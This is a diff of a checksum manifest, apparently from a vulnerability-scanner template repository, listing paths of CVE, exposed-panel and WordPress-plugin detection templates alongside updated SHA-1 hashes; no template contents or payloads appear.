helpers/wordpress/plugins/one-click-demo-import.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8 @@ -316,7 +316,7 @@ helpers/wordpress/plugins/password-protected.txt:1ff0f47f469eb98d13878242f03511f helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7f58 helpers/wordpress/plugins/photo-gallery.txt:d74e3a7c982dd8d79d90efee159d12d67876affc helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 -helpers/wordpress/plugins/pixelyoursite.txt:e42193e0ae8e59bc06e597280f1767837fb8fa82 +helpers/wordpress/plugins/pixelyoursite.txt:c6043029d8fee3b06ca3583c71e935a8241c7323 helpers/wordpress/plugins/polylang.txt:23d49915eae53800c735cfc0f01c21a9d05e727a helpers/wordpress/plugins/popup-builder.txt:9d6a9d6356ced33784bbde254c46c600df05d71f helpers/wordpress/plugins/popup-maker.txt:2b3c6ac23cfffce2c714f7553284e912852ab2fe @@ -325,7 +325,7 @@ helpers/wordpress/plugins/post-types-order.txt:ccc7f2bf6d0604d86f3d33a12b75411b3 helpers/wordpress/plugins/premium-addons-for-elementor.txt:9b2f4c3c25986436f50e7581b0398720d5de37be helpers/wordpress/plugins/pretty-link.txt:fbc954f986ea78ee55f14e1ee288f60983e46fb5 helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/really-simple-ssl.txt:cfb1a020caaeba8b61a9e907652aed3d696c8ce9 +helpers/wordpress/plugins/really-simple-ssl.txt:997b3601d8484e863fc64831e769a8b0b3dc1d2b helpers/wordpress/plugins/redirection.txt:392ee3765c26f4ca0b6935f9bb0f006c2354af12 helpers/wordpress/plugins/redux-framework.txt:5e3c54ec1686b257c15fe3bd98af9e08d983b8ab helpers/wordpress/plugins/regenerate-thumbnails.txt:d1fd48333115227b181b4b132e5511e91d95bea5 @@ -355,7 +355,7 @@ helpers/wordpress/plugins/translatepress-multilingual.txt:c696496c332f4053d97409 helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:591d71e97a25db692c2f038dbb7d616569b743f4 helpers/wordpress/plugins/under-construction-page.txt:7b482eb97a0d1e20b8b333a7435ce0e0bc59d15f helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d -helpers/wordpress/plugins/updraftplus.txt:ae159df5f109948cfff953af10b1dfdfb65e0adf +helpers/wordpress/plugins/updraftplus.txt:b942f95288dbef535d6c4bd8ba4db5b1dea75977 helpers/wordpress/plugins/use-any-font.txt:051efab22f2c58c6d458654f9abb0b0648c4743d helpers/wordpress/plugins/user-role-editor.txt:60504bf1a7119035ab8f7a2f8b0e566bf4a6dff3 helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264 @@ -385,7 +385,7 @@ helpers/wordpress/plugins/wp-mail-smtp.txt:95f4583e327a11aaa1ea09292b7411fda3205 helpers/wordpress/plugins/wp-maintenance-mode.txt:d3a5debecb62b3b70bbb48d3756a5239e112bc34 helpers/wordpress/plugins/wp-migrate-db.txt:f8b1cdd780aa1026f0dd192b2c25ed46c6cbe798 helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4deb3041acfd -helpers/wordpress/plugins/wp-optimize.txt:7a538645c3b7e9301a46c2d2aeb6d638783ac0e3 +helpers/wordpress/plugins/wp-optimize.txt:c207c37cf0046189cdf316228e3097a30d778d30 helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b3f helpers/wordpress/plugins/wp-reset.txt:1a907a1663fa62f8dac219d1a808e2abfcfa4f6a helpers/wordpress/plugins/wp-rollback.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad @@ -866,7 +866,7 @@ http/cves/2017/CVE-2017-5631.yaml:0f69370d759e590e9b0685b4f10ae7d4b2d2e2b7 http/cves/2017/CVE-2017-5638.yaml:1fba0de82787af2c4ca0d0e750459e93ac1a09e3 http/cves/2017/CVE-2017-5689.yaml:7cd7ae17afb47ab81348076a67450c5380c5a50a http/cves/2017/CVE-2017-5982.yaml:b991b6e0e208e20e6e115afb561508844937346f -http/cves/2017/CVE-2017-6090.yaml:33f31518225e059a9b85702b3b3fc7f0f8f61707 +http/cves/2017/CVE-2017-6090.yaml:631c7f98524cd6ab23d53035f7b2e59e97a6751c http/cves/2017/CVE-2017-7269.yaml:6ee6f5c6fb12d779ec4dc6337b6e5429336312b9 http/cves/2017/CVE-2017-7391.yaml:4efe04bc173535835a52ea0db7f94afffb5e20fc http/cves/2017/CVE-2017-7615.yaml:28c2d956681f291bfadb6ef743be0314b7904888 @@ -1255,7 +1255,7 @@ http/cves/2020/CVE-2020-17456.yaml:ce5c4510b1026e634673192108c6b116d8d0e920 http/cves/2020/CVE-2020-17496.yaml:b297b78680644e43b7e133f332b60a9a801b768a http/cves/2020/CVE-2020-17505.yaml:4248a4f9ccc30e15e883e1c077db31ae03f02c67 http/cves/2020/CVE-2020-17506.yaml:f6367d706f86772befa64be784b37509980b5545 -http/cves/2020/CVE-2020-17518.yaml:7bd646393c73608e9db970ac92198b31cdcc37c0 +http/cves/2020/CVE-2020-17518.yaml:f5ebc5bf2d79e7f518b1b0e3c89bbc414b7b9bed http/cves/2020/CVE-2020-17519.yaml:6bc006f55091e4d997565baa24d981da7aa71830 http/cves/2020/CVE-2020-17526.yaml:c5e506b85a10a62fd006fe40fa8cd4fb0609645a http/cves/2020/CVE-2020-17530.yaml:1919f143f2cda18c25291b369a8fe0a69dd58a00 @@ -1288,7 +1288,7 @@ http/cves/2020/CVE-2020-23575.yaml:24659de3930fd8dca762d607f15801fb27c47fa7 http/cves/2020/CVE-2020-23697.yaml:4fd1fcc31ec48e2771f37732d31a1d4094fd76cf http/cves/2020/CVE-2020-23972.yaml:86f0461aab638510be774d4586f064a1d4068131 http/cves/2020/CVE-2020-24148.yaml:67d31efc4ecd8492c56a328716cb100d66b20604 -http/cves/2020/CVE-2020-24186.yaml:b627b7fe3f4ea42dc4bb20c381621d32190bb782 +http/cves/2020/CVE-2020-24186.yaml:1c20b67e2a6b9a3ce81575579144d9986e7ad7d2 http/cves/2020/CVE-2020-24223.yaml:a469a19ee4f5edc5b6aee34f03dec3c48da0edfa http/cves/2020/CVE-2020-24312.yaml:cffa9a93e10b9a22d4ba0295b2a1d35b19dc1191 http/cves/2020/CVE-2020-24391.yaml:5d0325c062959980e6cabd2a02f2aa7e372bb41f @@ -1301,7 +1301,7 @@ http/cves/2020/CVE-2020-24903.yaml:c41f75ade1b76701bb1664bef609ab6f5414e8f5 http/cves/2020/CVE-2020-24912.yaml:da86d2e250e0a5ead3c919ff8c165ec429547ae6 http/cves/2020/CVE-2020-24949.yaml:7a5a2a3b526f66496ec94bbfbad097c9bd11317a http/cves/2020/CVE-2020-25078.yaml:233e307ccfc1f0d4229ad2b02aaa0a6b5a13a0e4 -http/cves/2020/CVE-2020-25213.yaml:623f4b7d9598e26bff0e000383eb59768e4556d5 +http/cves/2020/CVE-2020-25213.yaml:4d9024a004a64e200a2d3c796cf3000830c4d9a3 http/cves/2020/CVE-2020-25223.yaml:2a57962784872f67e7f1ae7717c366146deff27f http/cves/2020/CVE-2020-25495.yaml:ab6a4eeed32d149381fe394912d28c4ae5912f5c http/cves/2020/CVE-2020-25506.yaml:a8c432df51662a75fb0cb4139861dfbaecf88243 @@ -1331,7 +1331,7 @@ http/cves/2020/CVE-2020-27986.yaml:136fd3ca4193eb4e0712595bbb6ed7aef321be8d http/cves/2020/CVE-2020-28188.yaml:c420030e17aa66104914b27eeae8865eebd61e0b http/cves/2020/CVE-2020-28208.yaml:bf13f2a4afa828e1d49e0fac6c02758ea1c84e09 http/cves/2020/CVE-2020-28351.yaml:19143ce3ec0a756d2f308f92b27cd5c5d2bd3a28 -http/cves/2020/CVE-2020-28871.yaml:b4a42952342751eb68c9bdf392d6d3ecaa845535 +http/cves/2020/CVE-2020-28871.yaml:44e214f67a2e2a9c76640aef3570266c3320b0bb http/cves/2020/CVE-2020-28976.yaml:2f6d709ee8879ee4c78886febdff47dfd80c3098 http/cves/2020/CVE-2020-29164.yaml:d9a5213b36770d24a091e7a411d4c04e7a98b8bf http/cves/2020/CVE-2020-29227.yaml:e21af265bf58f3f2ad9598b7d8c12c30535023c8 @@ -1345,7 +1345,7 @@ http/cves/2020/CVE-2020-3452.yaml:e3db6c1ab42a97e0774b4c1806c58a5bac20dbe2 http/cves/2020/CVE-2020-35234.yaml:852a543f982e34fd1846ba14ae59070d557f172c http/cves/2020/CVE-2020-35338.yaml:2e7aaed45f07d8098a229e448687ee9db8b7aaa5 http/cves/2020/CVE-2020-35476.yaml:71d35fb39d1383b19963d35da152974c7ee9a952 -http/cves/2020/CVE-2020-35489.yaml:aeda2bb9e45bc5a1e7a8d21a21f38e29890988c0 +http/cves/2020/CVE-2020-35489.yaml:4732a27b7f915e00169285521584965b6cd3e131 http/cves/2020/CVE-2020-35580.yaml:73fe325bfb19913cf3ece302723108eab8fb4aee http/cves/2020/CVE-2020-35598.yaml:63f63712a0d0fc827b657a6874aeb769a05f9709 http/cves/2020/CVE-2020-35713.yaml:f18517b463f20d699c1d3f0da2383c65959c14ef @@ -1420,7 +1420,7 @@ http/cves/2020/CVE-2020-9757.yaml:598424991dde28fe6eec8c370998f695df86a66b http/cves/2021/CVE-2021-1472.yaml:286ddb8ab4b69313cc896cdd4e78d263170cce19 http/cves/2021/CVE-2021-1497.yaml:7089f7073bbf30d5c239989a0c37cd6056c64999 http/cves/2021/CVE-2021-1498.yaml:818733cb47e5e6649faf935ccd1e380241b00ce6 -http/cves/2021/CVE-2021-1499.yaml:850b16f0bbc6b2daa8f6d79549745940f17afeac +http/cves/2021/CVE-2021-1499.yaml:e1814a0900cbd51312c5f29fa97a5578fbcd41e3 http/cves/2021/CVE-2021-20031.yaml:9754993b66765cc4da9f03db3768a51cb85b8ec9 http/cves/2021/CVE-2021-20038.yaml:c0a958b7302b6bc31ada4e4bbc53f678a180d3f0 http/cves/2021/CVE-2021-20090.yaml:6315bc6988ca561b9e595fae0d934a079cd115c2 @@ -1459,7 +1459,7 @@ http/cves/2021/CVE-2021-21881.yaml:9906ffcf3470a1b14fff1de29f819a49c58ff638 http/cves/2021/CVE-2021-21972.yaml:e703045537bf487b23d0afebddd9351925c72129 http/cves/2021/CVE-2021-21973.yaml:72c5d98c89d8623e16681c1cdeba7dda935a419e http/cves/2021/CVE-2021-21975.yaml:cda78388f3c496fb9878068a4541fa29120bb5d9 -http/cves/2021/CVE-2021-21978.yaml:c753a5253b623c5876297e7f4df4ebf2c3e94a8d +http/cves/2021/CVE-2021-21978.yaml:d5f929d3b8925712acf42a6bae36b4dab700dff4 http/cves/2021/CVE-2021-21985.yaml:db0fe438a32e66e2f3b8a5f21763060bd5cdb710 http/cves/2021/CVE-2021-22005.yaml:239d5e7276cf9b33b2f34408c9a7143e9af6138a http/cves/2021/CVE-2021-22053.yaml:c60610a5ea31827e39b669162e16adbe6799e7ba @@ -1669,7 +1669,7 @@ http/cves/2021/CVE-2021-33544.yaml:0aa3b348ba2e10735b7deb629ce1d1e61008b85e http/cves/2021/CVE-2021-33564.yaml:56c6f3cecf2db0cf41c42370849ff01b830f801c http/cves/2021/CVE-2021-3374.yaml:facef627d497f44cc8cf413903009ff234246d58 http/cves/2021/CVE-2021-3377.yaml:7cd4dc5a07ca12c2410508d98a6f2ce631b33e3f -http/cves/2021/CVE-2021-3378.yaml:8d339ffba8b25ebbb7188850b9288f17896b74ab +http/cves/2021/CVE-2021-3378.yaml:bbd1c8c22b0e4bafd0033a3bc0338954b8f1403b http/cves/2021/CVE-2021-33807.yaml:8fcea17e43a0575f3ace34f3964739d90ab93528 http/cves/2021/CVE-2021-33851.yaml:d15375c56b3bac11326997f938348d6dfc673405 http/cves/2021/CVE-2021-33904.yaml:d58da06905672e7c3d214c6df99ec5ba7e4c43b2 @@ -1787,7 +1787,7 @@ http/cves/2021/CVE-2021-42667.yaml:46338878d5df8ae5baa7d524a43967cf12a561e4 http/cves/2021/CVE-2021-42887.yaml:35fed176e59d8b77182c892629987ddb259ec4c8 http/cves/2021/CVE-2021-43062.yaml:831e3eaa775eb329839d2b6aa055db3d6337c24e http/cves/2021/CVE-2021-43287.yaml:49c52d136e1b100afe8e823b210b2cf12b32b6f9 -http/cves/2021/CVE-2021-43421.yaml:ddf37da2771a2198726264252f4b753e13432255 +http/cves/2021/CVE-2021-43421.yaml:dcf96e44020b9912e16bdac5a5e4b0641b47cacb http/cves/2021/CVE-2021-43495.yaml:6e5f43e83c70b07e04558cb19c374a48621c14f6 http/cves/2021/CVE-2021-43496.yaml:fb8c4e23a65dab0af684afa383cd55836a2a7cb6 http/cves/2021/CVE-2021-43510.yaml:6df39012660aa9493d9e4a2d36b54bd6393f7b0e @@ -3105,7 +3105,7 @@ http/exposed-panels/retool-login.yaml:3927f2181acae2036ddda8b3c3c9677a85bad02c http/exposed-panels/riseup-panel.yaml:ec1b4f8a97935e9f07573ae2afedc5f42dab2e4f http/exposed-panels/rocketmq-console-exposure.yaml:66f29bdaf32fb452c16b33a5abe616168269b774 http/exposed-panels/room-alert-detect.yaml:1c7ad07f6a232b872b0ea056a24fd516c9624746 -http/exposed-panels/roxy-fileman.yaml:cd176981065e134f36ece799e188f37843f1fd1c +http/exposed-panels/roxy-fileman.yaml:26d820a011fdd75a2c8085ffb45057a91eea453a http/exposed-panels/royalevent-management-panel.yaml:b1db82600d565632070dfbf431119ac429627286 http/exposed-panels/rsa-self-service.yaml:c5e5e691f65131c9341ef41c7696fb6f32dc427c http/exposed-panels/rstudio-detect.yaml:c605c06308bd5e24576d555ea6129e88187d38b8 @@ -5362,214 +5362,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 -http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 -http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 -http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 -http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 -http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 -http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 -http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b -http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f -http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde -http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a -http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac 